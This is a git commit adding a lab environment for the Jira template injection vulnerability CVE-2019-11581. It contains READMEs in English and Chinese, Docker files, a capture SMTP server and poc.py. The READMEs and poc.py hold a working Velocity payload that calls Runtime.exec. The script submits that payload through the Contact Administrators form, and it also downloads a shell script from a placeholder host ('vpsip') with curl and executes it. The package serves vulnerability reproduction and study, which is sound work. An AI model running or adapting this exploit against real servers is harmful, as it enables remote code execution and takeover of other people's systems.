first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/jira/CVE-2019-11581/11.png
+++ b/jira/CVE-2019-11581/11.png
--- a/jira/CVE-2019-11581/12.png
+++ b/jira/CVE-2019-11581/12.png
--- a/jira/CVE-2019-11581/13.png
+++ b/jira/CVE-2019-11581/13.png
--- a/jira/CVE-2019-11581/7.png
+++ b/jira/CVE-2019-11581/7.png
--- a/jira/CVE-2019-11581/8.png
+++ b/jira/CVE-2019-11581/8.png
--- a/jira/CVE-2019-11581/9.png
+++ b/jira/CVE-2019-11581/9.png
--- a/jira/CVE-2019-11581/Dockerfile.smtpd
+++ b/jira/CVE-2019-11581/Dockerfile.smtpd
@@ -0,0 +1,7 @@
+FROM python:3.6-alpine3.9
+
+COPY smtpd_server.py /smtpd_server.py
+
+CMD ["python", "/smtpd_server.py"]
+
+EXPOSE 1025
--- a/jira/CVE-2019-11581/README.md
+++ b/jira/CVE-2019-11581/README.md
@@ -0,0 +1,69 @@
+# Atlassian Jira Template Injection (CVE-2019-11581)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Atlassian Jira is a widely used project and issue tracking tool in enterprises, commonly applied in defect tracking, customer service, requirements collection, process approval, task tracking, project tracking, and agile management. A template injection vulnerability was discovered in multiple versions that allows remote code execution.
+
+Affected versions include:
+
+- 4.4.x
+- 5.x.x
+- 6.x.x
+- 7.0.x - 7.13.x (Fixed in 7.6.14, 7.13.5)
+- 8.0.x - 8.2.x (Fixed in 8.0.3, 8.1.2, 8.2.3)
+
+References:
+
+- <https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html>
+- <https://jira.atlassian.com/browse/JRASERVER-69532>
+- <https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw>
+
+## Environment Setup
+
+Execute the following command to start Jira Server 8.1.0:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to begin the installation process:
+
+1. Switch to your preferred language
+2. Choose "Set it up for me" (first option)
+3. Apply for a Jira Server test license from Atlassian (do not select Data Center or Addons)
+4. Complete the installation process
+
+Note: Installation may fail or take longer on machines with limited memory. It's recommended to use a machine with at least 4GB of RAM.
+
+![](7.png)
+
+Add SMTP mail server at `/secure/admin/AddSmtpMailServer!default.jspa`:
+
+![](8.png)
+
+Enable "Contact Administrators Form" in System Settings at `/secure/admin/ViewApplicationProperties.jspa`:
+
+![](9.png)
+
+Create a sample project to complete the setup.
+
+## Vulnerability Reproduction
+
+The PoC is similar to CVE-2019-3396. You can use the following payload:
+
+```
+$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString()
+```
+
+You can either:
+
+1. Run `poc.py`, or
+2. Submit the PoC directly at `/secure/ContactAdministrators!default.jspa`
+
+![](11.png)
+
+![](12.png)
+
+If you don't see any data in smtpd, check the email queue at `/secure/admin/MailQueueAdmin!default.jspa`:
+
+![](13.png)
--- a/jira/CVE-2019-11581/README.zh-cn.md
+++ b/jira/CVE-2019-11581/README.zh-cn.md
@@ -0,0 +1,67 @@
+# Atlassian Jira 模板注入漏洞（CVE-2019-11581）
+
+Atlassian Jira是企业广泛使用的项目与事务跟踪工具，被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。在多个版本中发现了一个模板注入漏洞，攻击者可以利用该漏洞执行任意命令。
+
+受影响版本包括：
+
+- 4.4.x
+- 5.x.x
+- 6.x.x
+- 7.0.x - 7.13.x（在7.6.14、7.13.5版本修复）
+- 8.0.x - 8.2.x（在8.0.3、8.1.2、8.2.3版本修复）
+
+参考链接：
+
+- <https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html>
+- <https://jira.atlassian.com/browse/JRASERVER-69532>
+- <https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw>
+
+## 环境搭建
+
+执行如下命令启动Jira Server 8.1.0：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`进入安装向导：
+
+1. 切换到你偏好的语言
+2. 选择"将其设置为我"（第一个选项）
+3. 从Atlassian官方申请Jira Server测试许可证（不要选择Data Center或Addons）
+4. 完成安装过程
+
+注意：在内存有限的机器上，安装可能会失败或需要较长时间。建议使用至少4GB内存的机器进行安装和测试。
+
+![](7.png)
+
+在`/secure/admin/AddSmtpMailServer!default.jspa`添加SMTP邮件服务器：
+
+![](8.png)
+
+在系统设置`/secure/admin/ViewApplicationProperties.jspa`中启用"联系管理员表单"：
+
+![](9.png)
+
+创建一个示例项目以完成设置。
+
+## 漏洞复现
+
+PoC与CVE-2019-3396类似，可以使用以下payload：
+
+```
+$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString()
+```
+
+你也可以选择：
+
+1. 运行`poc.py`，或者
+2. 直接在`/secure/ContactAdministrators!default.jspa`提交PoC
+
+![](11.png)
+
+![](12.png)
+
+如果没有在smtpd中看到数据，可能是邮件队列阻塞，请在`/secure/admin/MailQueueAdmin!default.jspa`检查邮件队列：
+
+![](13.png)
--- a/jira/CVE-2019-11581/docker-compose.yml
+++ b/jira/CVE-2019-11581/docker-compose.yml
@@ -0,0 +1,12 @@
+services:
+  jira:
+    image: vulhub/jira:8.1.0
+    ports:
+      - "8080:8080"
+    links:
+      - smtpd
+
+  smtpd:
+    build:
+      context: .
+      dockerfile: Dockerfile.smtpd
--- a/jira/CVE-2019-11581/poc.py
+++ b/jira/CVE-2019-11581/poc.py
@@ -0,0 +1,46 @@
+# -*- coding: utf-8 -*-
+import requests
+
+req = requests.Session()
+
+def Base(url,subject):
+    print("[+] Get Token")
+    r = req.get("%s/secure/ContactAdministrators!default.jspa" % url)
+    c = r.headers['Set-Cookie']
+    t = c[c.find("=")+1:c.find(";")]
+    data = {
+        "from": "test@test.com",
+        "subject": subject,
+        "details": "v",
+        "atl_token": t,
+        "发送": "发送"
+    }
+    print("[+] Token : %s" % t)
+    print("[+] Exploit")
+    r = req.post("%s/secure/ContactAdministrators.jspa" %
+                 url, data=data, allow_redirects=False)
+    # print(r.status_code)
+
+def Exp(url, cmd="whoami"):
+    payload = """
+#set ($cmd="%s")
+#set ($e="exp")
+#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
+#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
+#set($sc = $e.getClass().forName("java.util.Scanner"))
+#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
+#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
+#if($scan.hasNext())
+    $scan.next()
+#end
+    """ % cmd
+    Base(url,payload)
+
+def Poc(url):
+    payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString()"
+    Base(url,payload)
+
+if __name__ == "__main__":
+    Poc("http://localhost:8080")
+    Exp("http://localhost:8080","curl vpsip/re.sh -o /tmp/re.sh")
+    Exp("http://localhost:8080","sh /tmp/re.sh")
--- a/jira/CVE-2019-11581/smtpd_server.py
+++ b/jira/CVE-2019-11581/smtpd_server.py
@@ -0,0 +1,21 @@
+import smtpd
+import asyncore,sys,time
+
+class CustomSMTPServer(smtpd.SMTPServer):
+    
+    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
+        r = data.decode("utf-8").split("\n")
+        for l in r:
+            if l.startswith("Subject:"):
+                sys.stdout.write("[{0}] {1}\n".format(time.time(),l))
+        sys.stdout.flush()
+        return
+
+
+# server = smtpd.DebuggingServer(('0.0.0.0', 1025), None)
+server = CustomSMTPServer(('0.0.0.0', 1025), None)
+
+sys.stdout.write("[+] Start SMTPServer on 0.0.0.0:1025\n")
+sys.stdout.flush()
+
+asyncore.loop()